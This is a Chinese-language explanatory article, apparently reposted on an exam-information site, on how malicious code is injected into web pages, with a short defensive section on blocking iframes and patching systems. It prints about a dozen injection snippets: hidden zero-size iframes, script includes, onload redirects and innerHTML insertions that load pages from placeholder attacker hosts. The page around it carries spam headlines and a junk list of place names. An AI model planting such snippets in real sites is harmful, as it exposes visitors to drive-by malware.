1976年贪婪的嘴唇,韩国少妇激三级做爰2023电影,久久久久久精品国产三级涨奶,妖精漫画在线观看免费漫画下拉式

各種網頁掛馬方式原理揭密(iframe掛馬,script 掛馬,圖片偽裝掛馬等)
來源:易賢網 閱讀:1235 次 日期:2016-05-12 10:39:53
溫馨提示:易賢網小編為您整理了“各種網頁掛馬方式原理揭密(iframe掛馬,script 掛馬,圖片偽裝掛馬等)”,方便廣大網友查閱!

(1)iframe 框架掛馬

在網頁上增加一行掛馬的程序,例如:

<iframe src=http://www.xxx.com/xxx.html width=0 height=0></iframe>

這種嵌入是的掛馬非常常見,在Google中搜索發現的可能還有木馬的網頁,一般都是被這種方式掛馬。這行語句就是在網頁打開的時候,同時打開另外一個網頁,當然這個網頁可能包含大量的木馬,也可能僅僅是為了騙取流量。

如果我們的網頁不使用iframe,我們可以屏蔽iframe屬性,這樣,即使網頁被iframe掛馬,也不會傷害到訪問網站的用戶。

【原理】:

IE5及其以后版本支持在CSS中使用expression,用來把CSS屬性和JavaScript腳本關聯起來,這里的CSS屬性可以是元素固有的屬性,也可以是自定義屬性。

我們在網頁中增加如下的代碼即可屏蔽iframe屬性:

<style type=”text/css”>

iframe{a:expression(this.src=’about:blank’,this.outerHTML=”);}

</style>

iframe 也可以采用加密的方式掛馬,例如下面的代碼:

<iframe src=http://google-analitecs.com/in.cgi????? width=1 height=1></iframe>

(2)script 掛馬

通過script的調用來掛馬,可以掛直接的html文件,也可以掛js文件,可以明文掛馬,為了躲避追查,也有加密掛馬的形式,形式各異,千差萬別,主要方式如下:

<script src=http://%11%11%11%11%11%11%11></script>

這是一個加密的掛馬語句;

2.1 htm文件掛馬:

通過上傳一個木馬文件(x.htm)掛馬,代碼如下:

document.write(“<div style=’display:none’>”)

document.write(“<iframe src=x.htm width=0 height=0></iframe>”)

document.write(“</div>”)

htm 掛馬代碼:

<script src=x.htm></script>

2.2 js文件掛馬

通過上傳一個木馬文件(x.js)掛馬,代碼如下:

document.write(“<iframe width=’0′ height=’0′ src=’http://xxx.com/xxx.htm’></iframe>”);

 

JS掛馬代碼:

<script language=javascript src=x.js></script>

當然也可以掛互聯網上任何一臺機器的x.js文件;

2.3  js變形加密

<SCRIPT language=”JScript.Encode” src=http://www.xxx.com/x.x></script>

(3)圖片偽裝掛馬

隨著防毒技術的發展,圖片木馬技術逃避殺毒監視的新技術,攻擊者將類似:http://www.xxx.com/x.htm中的木馬代碼植入到x.gif圖片文

件中,這些嵌入代碼的圖片都可以用工具生成。圖片木馬生成后,再利用代碼調用執行,是比較新穎的一種掛馬隱蔽方法,實例代碼如:

<html>

<iframe src=”http://www.x.com/x.htm” height=0 width=0></iframe>

<img src=”http://www.x.com/x.jpg”></center>

</html>

當用戶打開http://www.x.com/x.htm是,顯示給用戶的是http://www.x.com/x.jpg,而http://www.x.com/x.htm網頁代碼也隨之運行。

(4)其它的掛馬方式

4.1 body掛馬

<body onload=”window.location=’http://xxx.com/xxx.htm’;”></body>

也可以在css的body中掛馬

body {

background-image: url(‘javascript:document.write(“<script src=http://www.xxx.com/x.js></script>”)’)}

4.2 隱蔽掛馬

top.document.body.innerHTML = top.document.body.innerHTML +

‘\r\n<iframe src=”http://www.xxx.com/xxx.htm/”></iframe>’;

4.3 java的open函數掛馬

直接調用:

<SCRIPT language=javascript>

window.open (“x.htm”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1″);

</script>

欺騙調用:

<a href=”http://www.a.com(迷惑連接地址,顯示這個地址指向木馬地址)” onMouseOver=”www_a_com(); return true;”> 頁面要顯示的內容 </a>

<SCRIPT Language=”JavaScript”>

function www_a_com ()

{

var url=”網馬地址”;

open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,w

idth=800,height=600,left=10,top=10″);

}

</SCRIPT>

4.4 偽裝調用:

<frameset rows=”444,0″ cols=”*”>

<frame src=”a.htm” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″>

<frame src=”b.htm” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″>

</frameset>

形形色色的網頁掛馬,代碼都十分簡單,所以,互聯網木馬想要傳播,就會不停的開發新的掛馬方式,不停的加密隱藏自己,這樣才能逃過各種安全軟件的眼睛。其實,看看上文,很多語句都是編程常用的代碼,只是使用的目的不一樣罷了,了解了網頁掛馬的原理和方法,再防范網頁掛馬就容易多了。

帶木馬的網頁主要包括兩種類型:一種自己本身就是木馬網站,所有的頁面都有木馬,另一種是正常的網站,由于管理不善,被掛馬,成為木馬網站的一個中轉站,看看google中這樣的網站何其多,可能很多站長現在還不知道,呵呵,多學習學習吧,站長可不是那么好當的。

不過,僅僅有了網絡掛馬的代碼,也不一定一定能傳播木馬,只要我們加強防范,不讓我們的網頁被 掛馬,甚至,即使被掛馬了,打開了木馬網頁,我們的系統沒有漏洞,木馬網頁也同樣不能發揮作用的。所以,最重要的安全防范方式就是定期給系統打補丁,幾乎 所有的木馬網頁都無法發揮作用了。

更多信息請查看網站運營
由于各方面情況的不斷調整與變化,易賢網提供的所有考試信息和咨詢回復僅供參考,敬請考生以權威部門公布的正式信息和咨詢為準!
相關閱讀網站運營

2026國考·省考課程試聽報名

  • 報班類型
  • 姓名
  • 手機號
  • 驗證碼
關于我們 | 聯系我們 | 人才招聘 | 網站聲明 | 網站幫助 | 非正式的簡要咨詢 | 簡要咨詢須知 | 新媒體/短視頻平臺 | 手機站點 | 投訴建議
工業和信息化部備案號:滇ICP備2023014141號-1 云南省教育廳備案號:云教ICP備0901021 滇公網安備53010202001879號 人力資源服務許可證:(云)人服證字(2023)第0102001523號
云南網警備案專用圖標
聯系電話:0871-65099533/13759567129 獲取招聘考試信息及咨詢關注公眾號:hfpxwx
咨詢QQ:1093837350(9:00—18:00)版權所有:易賢網
云南網警報警專用圖標
主站蜘蛛池模板: 海盐县| 封开县| 遵化市| 康乐县| 花莲县| 尚志市| 东乡| 伊吾县| 名山县| 治县。| 开江县| 巨鹿县| 玉田县| 昭苏县| 辽阳县| 沈阳市| 漾濞| 元朗区| 康平县| 石家庄市| 洪洞县| 小金县| 滕州市| 东港市| 凤翔县| 潞西市| 北流市| 建德市| 崇文区| 拉孜县| 都江堰市| 中方县| 宁国市| 临猗县| 开平市| 山东省| 石景山区| 瑞丽市| 阿拉善左旗| 安图县| 小金县|